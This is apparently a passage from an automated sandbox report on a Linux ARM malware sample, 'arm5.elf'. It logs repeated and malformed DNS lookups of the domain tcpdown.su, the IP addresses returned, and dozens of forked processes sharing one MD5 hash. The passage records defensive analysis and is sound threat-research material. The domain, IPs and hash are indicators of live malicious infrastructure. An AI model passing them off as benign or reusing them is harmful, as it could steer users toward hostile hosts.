Jan 7, 2025 01:28:24.451879978 CET	43154	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:29.453876019 CET	50000	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:34.457639933 CET	34577	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:39.461802959 CET	50646	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:44.465631962 CET	48076	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:50.983656883 CET	37366	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:50.992387056 CET	53	37366	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:50.992981911 CET	34795	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:51.007659912 CET	53	34795	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:51.008529902 CET	34164	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:51.022861958 CET	53	34164	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:51.023720026 CET	33261	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:51.030919075 CET	53	33261	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:51.031742096 CET	34502	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:51.039036036 CET	53	34502	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:51.039915085 CET	36024	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:56.041621923 CET	34180	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:01.045727015 CET	40888	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:06.050189972 CET	36800	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:11.053636074 CET	36177	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:17.601105928 CET	52959	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:17.608778000 CET	53	52959	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:17.609426022 CET	45435	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:17.617476940 CET	53	45435	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:17.618112087 CET	38418	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:17.625271082 CET	53	38418	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:17.628978014 CET	47826	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:17.635952950 CET	53	47826	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:17.636749029 CET	53254	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:17.645555019 CET	53	53254	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:17.646199942 CET	52646	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:22.655579090 CET	45670	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:27.657638073 CET	33315	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:32.664514065 CET	45963	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:37.669831038 CET	36723	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:44.232898951 CET	42643	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:44.239711046 CET	53	42643	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:44.240386963 CET	34890	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:44.247523069 CET	53	34890	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:44.248133898 CET	34518	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:44.267493010 CET	53	34518	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:44.268177032 CET	39188	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:44.282350063 CET	53	39188	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:44.282936096 CET	52913	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:44.290131092 CET	53	52913	1.1.1.1	192.168.2.13
Jan 7, 2025 01:29:44.290682077 CET	44482	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:49.294729948 CET	43859	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:54.297662973 CET	46059	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:29:59.302301884 CET	42143	53	192.168.2.13	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 01:27:56.028634071 CET	192.168.2.13	1.1.1.1	0x8159	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.039400101 CET	192.168.2.13	1.1.1.1	0x4ac6	Standard query (0)	tcpdown.su\|1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.050663948 CET	192.168.2.13	1.1.1.1	0x4ac6	Standard query (0)	tcpdown.su\|1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.062861919 CET	192.168.2.13	1.1.1.1	0x4ac6	Standard query (0)	tcpdown.su\|1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.072755098 CET	192.168.2.13	1.1.1.1	0x4ac6	Standard query (0)	tcpdown.su\|1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.089766979 CET	192.168.2.13	1.1.1.1	0x4ac6	Standard query (0)	tcpdown.su\|1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.670093060 CET	192.168.2.13	1.1.1.1	0x30d4	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.681900978 CET	192.168.2.13	1.1.1.1	0x30d4	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.705338001 CET	192.168.2.13	1.1.1.1	0x30d4	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.724271059 CET	192.168.2.13	1.1.1.1	0x30d4	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.742723942 CET	192.168.2.13	1.1.1.1	0x30d4	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.760874033 CET	192.168.2.13	1.1.1.1	0xb6d8	Standard query (0)	tcpdown.suo. [malformed]	256	273	false
Jan 7, 2025 01:28:02.773195028 CET	192.168.2.13	1.1.1.1	0xb6d8	Standard query (0)	tcpdown.suo. [malformed]	256	274	false
Jan 7, 2025 01:28:07.796875954 CET	192.168.2.13	1.1.1.1	0xb6d8	Standard query (0)	tcpdown.suo. [malformed]	256	280	false
Jan 7, 2025 01:28:12.816653967 CET	192.168.2.13	1.1.1.1	0xb6d8	Standard query (0)	tcpdown.suo. [malformed]	256	284	false
Jan 7, 2025 01:28:17.822242022 CET	192.168.2.13	1.1.1.1	0xb6d8	Standard query (0)	tcpdown.suo. [malformed]	256	289	false
Jan 7, 2025 01:28:24.397305965 CET	192.168.2.13	1.1.1.1	0xfe61	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.405100107 CET	192.168.2.13	1.1.1.1	0xfe61	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.424920082 CET	192.168.2.13	1.1.1.1	0xfe61	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.433701992 CET	192.168.2.13	1.1.1.1	0xfe61	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.441704988 CET	192.168.2.13	1.1.1.1	0xfe61	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.451879978 CET	192.168.2.13	1.1.1.1	0xe301	Standard query (0)	tcpdown.suo. [malformed]	256	299	false
Jan 7, 2025 01:28:29.453876019 CET	192.168.2.13	1.1.1.1	0xe301	Standard query (0)	tcpdown.suo. [malformed]	256	304	false
Jan 7, 2025 01:28:34.457639933 CET	192.168.2.13	1.1.1.1	0xe301	Standard query (0)	tcpdown.suo. [malformed]	256	309	false
Jan 7, 2025 01:28:39.461802959 CET	192.168.2.13	1.1.1.1	0xe301	Standard query (0)	tcpdown.suo. [malformed]	256	315	false
Jan 7, 2025 01:28:44.465631962 CET	192.168.2.13	1.1.1.1	0xe301	Standard query (0)	tcpdown.suo. [malformed]	256	321	false
Jan 7, 2025 01:28:50.983656883 CET	192.168.2.13	1.1.1.1	0x2343	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:50.992981911 CET	192.168.2.13	1.1.1.1	0x2343	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:51.008529902 CET	192.168.2.13	1.1.1.1	0x2343	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:51.023720026 CET	192.168.2.13	1.1.1.1	0x2343	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:51.031742096 CET	192.168.2.13	1.1.1.1	0x2343	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:51.039915085 CET	192.168.2.13	1.1.1.1	0x4a1	Standard query (0)	tcpdown.suo. [malformed]	256	324	false
Jan 7, 2025 01:28:56.041621923 CET	192.168.2.13	1.1.1.1	0x4a1	Standard query (0)	tcpdown.suo. [malformed]	256	330	false
Jan 7, 2025 01:29:01.045727015 CET	192.168.2.13	1.1.1.1	0x4a1	Standard query (0)	tcpdown.suo. [malformed]	256	338	false
Jan 7, 2025 01:29:06.050189972 CET	192.168.2.13	1.1.1.1	0x4a1	Standard query (0)	tcpdown.suo. [malformed]	256	339	false
Jan 7, 2025 01:29:11.053636074 CET	192.168.2.13	1.1.1.1	0x4a1	Standard query (0)	tcpdown.suo. [malformed]	256	344	false
Jan 7, 2025 01:29:17.601105928 CET	192.168.2.13	1.1.1.1	0xac14	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.609426022 CET	192.168.2.13	1.1.1.1	0xac14	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.618112087 CET	192.168.2.13	1.1.1.1	0xac14	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.628978014 CET	192.168.2.13	1.1.1.1	0xac14	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.636749029 CET	192.168.2.13	1.1.1.1	0xac14	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.646199942 CET	192.168.2.13	1.1.1.1	0xe3c	Standard query (0)	tcpdown.suo. [malformed]	256	354	false
Jan 7, 2025 01:29:22.655579090 CET	192.168.2.13	1.1.1.1	0xe3c	Standard query (0)	tcpdown.suo. [malformed]	256	354	false
Jan 7, 2025 01:29:27.657638073 CET	192.168.2.13	1.1.1.1	0xe3c	Standard query (0)	tcpdown.suo. [malformed]	256	360	false
Jan 7, 2025 01:29:32.664514065 CET	192.168.2.13	1.1.1.1	0xe3c	Standard query (0)	tcpdown.suo. [malformed]	256	369	false
Jan 7, 2025 01:29:37.669831038 CET	192.168.2.13	1.1.1.1	0xe3c	Standard query (0)	tcpdown.suo. [malformed]	256	369	false
Jan 7, 2025 01:29:44.232898951 CET	192.168.2.13	1.1.1.1	0xc2f7	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.240386963 CET	192.168.2.13	1.1.1.1	0xc2f7	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.248133898 CET	192.168.2.13	1.1.1.1	0xc2f7	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.268177032 CET	192.168.2.13	1.1.1.1	0xc2f7	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.282936096 CET	192.168.2.13	1.1.1.1	0xc2f7	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.290682077 CET	192.168.2.13	1.1.1.1	0xf6b4	Standard query (0)	tcpdown.suo. [malformed]	256	381	false
Jan 7, 2025 01:29:49.294729948 CET	192.168.2.13	1.1.1.1	0xf6b4	Standard query (0)	tcpdown.suo. [malformed]	256	384	false
Jan 7, 2025 01:29:54.297662973 CET	192.168.2.13	1.1.1.1	0xf6b4	Standard query (0)	tcpdown.suo. [malformed]	256	390	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 01:27:56.035677910 CET	1.1.1.1	192.168.2.13	0x8159	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.035677910 CET	1.1.1.1	192.168.2.13	0x8159	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.035677910 CET	1.1.1.1	192.168.2.13	0x8159	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.035677910 CET	1.1.1.1	192.168.2.13	0x8159	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.035677910 CET	1.1.1.1	192.168.2.13	0x8159	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.035677910 CET	1.1.1.1	192.168.2.13	0x8159	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.035677910 CET	1.1.1.1	192.168.2.13	0x8159	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.047415018 CET	1.1.1.1	192.168.2.13	0x4ac6	Name error (3)	tcpdown.su\|1	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.059755087 CET	1.1.1.1	192.168.2.13	0x4ac6	Name error (3)	tcpdown.su\|1	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.069763899 CET	1.1.1.1	192.168.2.13	0x4ac6	Name error (3)	tcpdown.su\|1	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.086808920 CET	1.1.1.1	192.168.2.13	0x4ac6	Name error (3)	tcpdown.su\|1	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:56.098995924 CET	1.1.1.1	192.168.2.13	0x4ac6	Name error (3)	tcpdown.su\|1	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.677966118 CET	1.1.1.1	192.168.2.13	0x30d4	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.701088905 CET	1.1.1.1	192.168.2.13	0x30d4	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.719511032 CET	1.1.1.1	192.168.2.13	0x30d4	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.738755941 CET	1.1.1.1	192.168.2.13	0x30d4	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:27:57.757059097 CET	1.1.1.1	192.168.2.13	0x30d4	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.404450893 CET	1.1.1.1	192.168.2.13	0xfe61	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.424210072 CET	1.1.1.1	192.168.2.13	0xfe61	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.433070898 CET	1.1.1.1	192.168.2.13	0xfe61	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.441091061 CET	1.1.1.1	192.168.2.13	0xfe61	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:24.451229095 CET	1.1.1.1	192.168.2.13	0xfe61	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:50.992387056 CET	1.1.1.1	192.168.2.13	0x2343	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:51.007659912 CET	1.1.1.1	192.168.2.13	0x2343	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:51.022861958 CET	1.1.1.1	192.168.2.13	0x2343	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:51.030919075 CET	1.1.1.1	192.168.2.13	0x2343	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:28:51.039036036 CET	1.1.1.1	192.168.2.13	0x2343	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.608778000 CET	1.1.1.1	192.168.2.13	0xac14	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.617476940 CET	1.1.1.1	192.168.2.13	0xac14	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.625271082 CET	1.1.1.1	192.168.2.13	0xac14	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.635952950 CET	1.1.1.1	192.168.2.13	0xac14	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:17.645555019 CET	1.1.1.1	192.168.2.13	0xac14	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.239711046 CET	1.1.1.1	192.168.2.13	0xc2f7	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.247523069 CET	1.1.1.1	192.168.2.13	0xc2f7	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.267493010 CET	1.1.1.1	192.168.2.13	0xc2f7	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.282350063 CET	1.1.1.1	192.168.2.13	0xc2f7	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:29:44.290131092 CET	1.1.1.1	192.168.2.13	0xc2f7	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: arm5.elf PID: 5484, Parent PID: 5402

General

Start time (UTC):	00:27:53
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	/tmp/arm5.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5486, Parent PID: 5484

General

Start time (UTC):	00:27:53
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5488, Parent PID: 5486

General

Start time (UTC):	00:27:53
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5535, Parent PID: 5488

General

Start time (UTC):	00:28:00
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5537, Parent PID: 5488

General

Start time (UTC):	00:28:00
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5539, Parent PID: 5488

General

Start time (UTC):	00:28:01
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5545, Parent PID: 5488

General

Start time (UTC):	00:28:01
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5547, Parent PID: 5488

General

Start time (UTC):	00:28:01
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5556, Parent PID: 5488

General

Start time (UTC):	00:28:02
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5564, Parent PID: 5488

General

Start time (UTC):	00:28:06
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5566, Parent PID: 5488

General

Start time (UTC):	00:28:06
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5608, Parent PID: 5488

General

Start time (UTC):	00:28:12
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5610, Parent PID: 5488

General

Start time (UTC):	00:28:12
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5640, Parent PID: 5488

General

Start time (UTC):	00:28:17
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5643, Parent PID: 5488

General

Start time (UTC):	00:28:17
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5652, Parent PID: 5488

General

Start time (UTC):	00:28:22
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5661, Parent PID: 5488

General

Start time (UTC):	00:28:27
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5666, Parent PID: 5488

General

Start time (UTC):	00:28:27
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5671, Parent PID: 5488

General

Start time (UTC):	00:28:32
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5674, Parent PID: 5488

General

Start time (UTC):	00:28:32
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5682, Parent PID: 5488

General

Start time (UTC):	00:28:37
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5685, Parent PID: 5488

General

Start time (UTC):	00:28:37
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5697, Parent PID: 5488

General

Start time (UTC):	00:28:42
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5700, Parent PID: 5488

General

Start time (UTC):	00:28:42
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5711, Parent PID: 5488

General

Start time (UTC):	00:28:51
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5713, Parent PID: 5488

General

Start time (UTC):	00:28:51
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5722, Parent PID: 5488

General

Start time (UTC):	00:28:57
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5725, Parent PID: 5488

General

Start time (UTC):	00:28:57
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5735, Parent PID: 5488

General

Start time (UTC):	00:29:06
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5738, Parent PID: 5488

General

Start time (UTC):	00:29:06
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5750, Parent PID: 5488

General

Start time (UTC):	00:29:11
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5752, Parent PID: 5488

General

Start time (UTC):	00:29:11
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5762, Parent PID: 5488

General

Start time (UTC):	00:29:21
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5765, Parent PID: 5488

General

Start time (UTC):	00:29:21
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5773, Parent PID: 5488

General

Start time (UTC):	00:29:27
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5775, Parent PID: 5488

General

Start time (UTC):	00:29:27
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5778, Parent PID: 5488

General

Start time (UTC):	00:29:27
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5788, Parent PID: 5488

General

Start time (UTC):	00:29:36
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5796, Parent PID: 5488

General

Start time (UTC):	00:29:42
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5798, Parent PID: 5488

General

Start time (UTC):	00:29:42
